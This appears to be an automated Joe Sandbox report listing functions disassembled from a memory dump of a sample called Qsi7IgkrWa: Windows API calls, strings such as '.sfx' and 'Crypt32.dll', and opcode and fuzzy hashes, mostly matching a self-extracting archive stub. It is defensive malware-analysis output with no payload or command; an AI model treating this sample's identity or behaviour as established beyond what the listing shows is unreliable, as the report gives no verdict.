PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BCDC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BCDC72
TranslateMessage.USER32(?), ref: 00BCDC7C
DispatchMessageW.USER32(?), ref: 00BCDC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 00BCDC91

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: c9369c7ab4c1a8e9ef85386a3fefc9e764e0f160b4fc8d3cdc7534da36b79440
Instruction ID: 8efd43ed9258c549820ee6287c5a1f07947ef4b9c8634a693b456a6c7369e9a3
Opcode Fuzzy Hash: c9369c7ab4c1a8e9ef85386a3fefc9e764e0f160b4fc8d3cdc7534da36b79440
Instruction Fuzzy Hash: 4BF03C72A01259BBCF20ABA5DC4CFDF7FADEF46795B008021B50AE2051D674C646C7A0

Function 00BBC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00BC05DA: _wcslen.LIBCMT ref: 00BC05E0

Part of subcall function 00BBB92D: _wcsrchr.LIBVCRUNTIME ref: 00BBB944

_wcslen.LIBCMT ref: 00BBC197
_wcslen.LIBCMT ref: 00BBC1DF

Strings

.rar, xrefs: 00BBC0E1, 00BBC134
.exe, xrefs: 00BBC10B
.sfx, xrefs: 00BBC11A

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: 4df984b8b07eee7ba1d02da741dddebe56827d381ed755d42c056ae850a2947e
Instruction ID: 5c3af1b62e2abcf31d3c14438dd4ee6fb7a5e52c251dfa884f883ec630c1c65d
Opcode Fuzzy Hash: 4df984b8b07eee7ba1d02da741dddebe56827d381ed755d42c056ae850a2947e
Instruction Fuzzy Hash: AB41F42654075197C731FF688846EBABBE8EF41B44F1449CEF992BB182EBD04D81C3A5

Function 00BCCE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 00BCCE9D

Part of subcall function 00BBB690: _wcslen.LIBCMT ref: 00BBB696

_swprintf.LIBCMT ref: 00BCCED1

Part of subcall function 00BB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BB40A5

SetDlgItemTextW.USER32(?,00000066,00BF946A), ref: 00BCCEF1
EndDialog.USER32(?,00000001), ref: 00BCCFFE

Strings

%s%s%u, xrefs: 00BCCEC6

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
String ID: %s%s%u
API String ID: 110358324-1360425832
Opcode ID: c27ffefbfa57659b55a5b39e49f5bfff99e91efeadf11f6141150eabcd105c86
Instruction ID: 4fe7db225d07f34354c79b9b30628657adcb6738f388060064c84faac9579673
Opcode Fuzzy Hash: c27ffefbfa57659b55a5b39e49f5bfff99e91efeadf11f6141150eabcd105c86
Instruction Fuzzy Hash: AE416DB5900259AADF259B508C85FEE77ECEB15304F4080EAFA09E7151EF709A84CF65

Function 00BBBB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BBBB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00BBA275,?,?,00000800,?,00BBA23A,?,00BB755C), ref: 00BBBBC5
_wcslen.LIBCMT ref: 00BBBC3B

Strings

UNC, xrefs: 00BBBBA7
\\?\, xrefs: 00BBBB52, 00BBBB99, 00BBBBF7, 00BBBC4E

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: 3323c18e24dd15d7e5671e899e3e922c31afc7906377504db3e3855b3ff9d991
Instruction ID: 9da00980e61290d6b460d82463f8b9b562bf3495217b06bfd95b3d33c163ac85
Opcode Fuzzy Hash: 3323c18e24dd15d7e5671e899e3e922c31afc7906377504db3e3855b3ff9d991
Instruction Fuzzy Hash: 00418E35440255BBCB21EF60CC45EFA7BE9EF45790F1044EAF955A3152EBF0DA908AA0

Function 00BCB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 00BCB6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 00BCB712
DeleteObject.GDI32(00000000), ref: 00BCB744
DeleteObject.GDI32(00000000), ref: 00BCB767

Part of subcall function 00BCA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00BCB73D,00000066), ref: 00BCA6D5
Part of subcall function 00BCA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00BCB73D,00000066), ref: 00BCA6EC
Part of subcall function 00BCA6C2: LoadResource.KERNEL32(00000000,?,?,?,00BCB73D,00000066), ref: 00BCA703
Part of subcall function 00BCA6C2: LockResource.KERNEL32(00000000,?,?,?,00BCB73D,00000066), ref: 00BCA712
Part of subcall function 00BCA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00BCB73D,00000066), ref: 00BCA72D
Part of subcall function 00BCA6C2: GlobalLock.KERNEL32(00000000), ref: 00BCA73E
Part of subcall function 00BCA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00BCA762
Part of subcall function 00BCA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00BCA7A7
Part of subcall function 00BCA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00BCA7C6
Part of subcall function 00BCA6C2: GlobalFree.KERNEL32(00000000), ref: 00BCA7CD

Strings

], xrefs: 00BCB71A

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
String ID: ]
API String ID: 1797374341-3352871620
Opcode ID: a08b5455c3fe2252aad28b7338f16daa576ca63f04233a7ddfd2ff6d88ab8f3f
Instruction ID: d88dfa168e7782ede0adc3f8748552aa52c1dfdb47bdac71230510ac22dfda9c
Opcode Fuzzy Hash: a08b5455c3fe2252aad28b7338f16daa576ca63f04233a7ddfd2ff6d88ab8f3f
Instruction Fuzzy Hash: CE01C036500209A7CB1277749C0AFBF7AF9EBC5B5AF0900AAFD00B7291DF218D0546B2

Function 00BCD600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00BB1316: GetDlgItem.USER32(00000000,00003021), ref: 00BB135A
Part of subcall function 00BB1316: SetWindowTextW.USER32(00000000,00BE35F4), ref: 00BB1370

EndDialog.USER32(?,00000001), ref: 00BCD64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00BCD661
SetDlgItemTextW.USER32(?,00000066,?), ref: 00BCD675
SetDlgItemTextW.USER32(?,00000068), ref: 00BCD684

Strings

RENAMEDLG, xrefs: 00BCD618

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 74c4defbecb3044df2cab83a2b7ac51d2bf8bc53fb11bea8054f658c439e1020
Instruction ID: 7e67ff487a5a05d8f23094abf6f8af4513c62acfe50e6fee194007a4ee4b0832
Opcode Fuzzy Hash: 74c4defbecb3044df2cab83a2b7ac51d2bf8bc53fb11bea8054f658c439e1020
Instruction Fuzzy Hash: B901F537344314BBE2208F649D49FAE77DCFB5AB01F114478F305A2091C7A29905CB75

Function 00BD7E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00BD7E24,00000000,?,00BD7DC4,00000000,00BEC300,0000000C,00BD7F1B,00000000,00000002), ref: 00BD7E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BD7EA6
FreeLibrary.KERNEL32(00000000,?,?,?,00BD7E24,00000000,?,00BD7DC4,00000000,00BEC300,0000000C,00BD7F1B,00000000,00000002), ref: 00BD7EC9

Strings

CorExitProcess, xrefs: 00BD7E9E
mscoree.dll, xrefs: 00BD7E8C

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: cd9101b26ff306358328fb362b040d3beeaaa1a3df57bf6f03e8bf5f712c9954
Instruction ID: e6a5f09c7e48e852cb76e9d2a904aaf23328fc6f47ce53222a90b80de1565d57
Opcode Fuzzy Hash: cd9101b26ff306358328fb362b040d3beeaaa1a3df57bf6f03e8bf5f712c9954
Instruction Fuzzy Hash: 54F03135940248BBDB119BA1DC4DBAEFFF9EF44751F0041E9E805A7260EF309E40CA90

Function 00BBF2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BC0836
Part of subcall function 00BC081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BBF2D8,Crypt32.dll,00000000,00BBF35C,?,?,00BBF33E,?,?,?), ref: 00BC0858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00BBF2E4
GetProcAddress.KERNEL32(00BF81C8,CryptUnprotectMemory), ref: 00BBF2F4

Strings

CryptProtectMemory, xrefs: 00BBF2DE
Crypt32.dll, xrefs: 00BBF2CE
CryptUnprotectMemory, xrefs: 00BBF2EA

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 3d77d48d6ee9614989a72a7bcab2409f485f4ba1a5fde455e82d7dbd450dd3f1
Instruction ID: 223553431e802d7fe61bdd04afd67d8dfc43053a83ec369cd85451f002d23e6c
Opcode Fuzzy Hash: 3d77d48d6ee9614989a72a7bcab2409f485f4ba1a5fde455e82d7dbd450dd3f1
Instruction Fuzzy Hash: E8E086709107829FC7209F359C4DB657AD4AF04F00F14C8EDF0DA93661DBB4D5808B50

Function 00BD2BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00BD2CA1
___AdjustPointer.LIBCMT ref: 00BD2CC4
_abort.LIBCMT ref: 00BD2D12
___AdjustPointer.LIBCMT ref: 00BD2D60

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: d740ddc1d05b8b0e8bad6e31607ab03b4b543f48ed5b79acbe8b25116f6d5d9e
Instruction ID: 5ed940c2aaf30c2d283bf20bab66c35b8551a4a3a3e3216aabc894b6d9b55d1b
Opcode Fuzzy Hash: d740ddc1d05b8b0e8bad6e31607ab03b4b543f48ed5b79acbe8b25116f6d5d9e
Instruction Fuzzy Hash: F951CF71601292AFDB299F14D985BAAF7E5FF64310F2841AFE801473A1F732AD41DB90

Function 00BDBF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00BDBF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BDBF5C

Part of subcall function 00BD8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BDCA2C,00000000,?,00BD6CBE,?,00000008,?,00BD91E0,?,?,?), ref: 00BD8E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00BDBF82
_free.LIBCMT ref: 00BDBF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BDBFA4

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 67de7b1874d46026d8265fbef55c8ef06b67649c98170f4822f96d65c3b1c1f4
Instruction ID: 3a541cfcd0ab2df1cc740abfa43b766c1ff87ad5cd2e6cb0397757b4b21a3134
Opcode Fuzzy Hash: 67de7b1874d46026d8265fbef55c8ef06b67649c98170f4822f96d65c3b1c1f4
Instruction Fuzzy Hash: 57019E62601211BF272117665C9DC7FAAEDDEC6FA131601AEB904D7340FF608D0185B1

Function 00BD9869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00BD91AD,00BDB188,?,00BD9813,00000001,00000364,?,00BD3F73,00000050,?,00BF1030,00000200), ref: 00BD986E
_free.LIBCMT ref: 00BD98A3
_free.LIBCMT ref: 00BD98CA
SetLastError.KERNEL32(00000000,?,00BF1030,00000200), ref: 00BD98D7
SetLastError.KERNEL32(00000000,?,00BF1030,00000200), ref: 00BD98E0

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 82cedd013229c33488963188d45d2b60547f1c0ba21bea8e300b3f4d6432c89c
Instruction ID: 21a67769901eff44cf52c3a12aee5ff68df0768676b920c39764c2f519669821
Opcode Fuzzy Hash: 82cedd013229c33488963188d45d2b60547f1c0ba21bea8e300b3f4d6432c89c
Instruction Fuzzy Hash: FA01F9362446016BC3162724ACC991BA6EADBD3FB1B3101B7F51597392FE32CD01B525

Function 00BC0EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00BC11CF: ResetEvent.KERNEL32(?), ref: 00BC11E1
Part of subcall function 00BC11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00BC11F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00BC0F21
CloseHandle.KERNEL32(?,?), ref: 00BC0F3B
DeleteCriticalSection.KERNEL32(?), ref: 00BC0F54
CloseHandle.KERNEL32(?), ref: 00BC0F60
CloseHandle.KERNEL32(?), ref: 00BC0F6C

Part of subcall function 00BC0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00BC1206,?), ref: 00BC0FEA
Part of subcall function 00BC0FE4: GetLastError.KERNEL32(?), ref: 00BC0FF6

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 11769c46723d80e397ca278edf663fc69bccb63fc45c60908de2711c424b008e
Instruction ID: f8f40225d304a40b69f75cc5f3eb91f3e79df18483aabcd40afae4ece1784c4a
Opcode Fuzzy Hash: 11769c46723d80e397ca278edf663fc69bccb63fc45c60908de2711c424b008e
Instruction Fuzzy Hash: D6015E72100784EFC722AF65DC88FD6BBE9FB08B10F00096DF26A93161CB757A44CA50

Function 00BDC7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00BDC817

Part of subcall function 00BD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BDC896,?,00000000,?,00000000,?,00BDC8BD,?,00000007,?,?,00BDCCBA,?), ref: 00BD8DE2
Part of subcall function 00BD8DCC: GetLastError.KERNEL32(?,?,00BDC896,?,00000000,?,00000000,?,00BDC8BD,?,00000007,?,?,00BDCCBA,?,?), ref: 00BD8DF4

_free.LIBCMT ref: 00BDC829
_free.LIBCMT ref: 00BDC83B
_free.LIBCMT ref: 00BDC84D
_free.LIBCMT ref: 00BDC85F

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3c291407e3e3996ee93e847b83cea9ea7490c28952e980b028be690d2942f738
Instruction ID: 8cdc583625ab94afb7a757f47c733e02be504867a709619af9b12b0f41e010ff
Opcode Fuzzy Hash: 3c291407e3e3996ee93e847b83cea9ea7490c28952e980b028be690d2942f738
